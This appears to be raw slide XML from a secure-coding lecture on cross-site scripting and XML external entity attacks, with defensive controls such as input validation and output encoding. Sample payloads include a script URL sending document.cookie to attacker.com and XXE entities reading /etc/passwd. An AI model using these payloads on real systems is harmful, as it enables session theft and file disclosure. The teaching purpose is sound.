                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>A user is sent a phish to connect to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>OR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>An attack link is sent in a phish email</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF5DFAA4-437B-414E-9D76-8F8AA57E0BDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886201" y="2133600"/>
            <a:ext cx="4953000" cy="4595618"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29161547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ACA79-79F2-44C8-9B35-15D718F60A09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attack: DOM-Based XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB36F3A0-157B-4526-BAD5-4ECB7E9C1E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Document-Object Model (DOM) Based XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Phish sent to user:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://website.com/search? keyword=&lt;script&gt;window. location=‘http://attacker. com/?cookie=‘+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Keyword should be search value but instead is script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B47F3DB-328B-482A-B6F0-3502546FBE0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>When clicked, the search site executes the keyword:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;h1&gt; You searched for &lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;div id&gt; =“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>searchquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”&gt; &lt;/div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>var keyword = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>location.search.substring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(3);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.querySelector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>searchquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = keyword;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/script&gt;  &lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3584481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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0BE71FE-A2F1-4264-B3AC-58EB73A65985}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Vocabulary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93187" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47A96AB5-76FF-4E67-82DB-773CF82C4A5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Attack surface analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Buffer overflow, SQL injection, OS command injection, cross-site scripting, cleartext, race condition, chatty error message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Sanitization, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>allowlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>, blocklist, nonce, character encoding (UTF-8), jail or sandbox environment, positive check, negative check</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3863081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7549CB4B-1D2B-4F09-B8E6-16B68C89D601}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4000" dirty="0"/>
              <a:t>Summary:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34819" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9404D583-6015-4668-8ECD-6E79695A05C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2133600"/>
            <a:ext cx="8229600" cy="3733800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Persistent or Stored XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>: The attacker uses form input to modify a database.  The input includes infected links or files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Reflective XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>: Victim server returns infected client data, submitted as part of the client input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>DOM XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>: Modifies webpage code by modifying JavaScript in Document Object Model (DOM) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35170188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184035AF-EC02-4A15-9584-18DD50CF50F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="917575"/>
            <a:ext cx="8154988" cy="498598"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Control:  Content security policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B661BA71-6087-436F-ACCF-7FD3094C8AD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Separation of company data vs input: validate all parts of input data, webpage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Decode and normalize input, to prevent bypass of input validation; do not allow input to specify an encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Disallow special characters: &lt; &gt; ; ( )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Verify data type, length, syntax, business rules for all input; positive checks preferred</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Specify strong character encoding on output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Check output using security encoding library or anti-XSS library: Ruby on Rails, React JS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Patch libraries: XML, SOAP, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="829636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1698633-3AE0-AB31-8D67-C6FD306E649D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specify strong character encoding on output: UTF-8 or ISO-8859</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UTF-8 is an abbreviation for Unicode Transformation Format using 8 bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Same-origin Policy: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All components of a web page must use the same protocol and port number, and be derived from the same host.  If we </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>compare two URLs:  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.organization.com/directory1  https://organization.sales.com:85/directory3 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>they differ in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>protocol (http versus https)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>port number (default 80 versus 85)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>host (www.organization.com and organization.sales.com)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any single difference would violate the same-origin policy.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D73C52D-3678-6D20-8980-281D5D8B73A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS Controls: Validate Output</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1070095371"/>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609D4-C9F8-4AEE-AEE7-255004E4ECF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>External XML Input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5AA424-7D0A-481F-98D7-A390DC7BDA67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The attacker attempts to extract password data from server:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt; &lt;!DOCTYPE attack [ &lt;!ELEMENT attack ANY &gt; &lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> SYSTEM "file:///etc/passwd" &gt;]&gt; &lt;attack &gt;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>;&lt;/attack&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>An attacker probes server’s network by changing ENTITY line:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> SYSTEM "https://10.100.20.10/production" &gt;]&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A denial-of-service attack scans a very large file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;!ENTITY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> SYSTEM "file:///dev/random" &gt;]&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDF3763D-FABC-46FB-855D-D22C98EC6F89}"/>
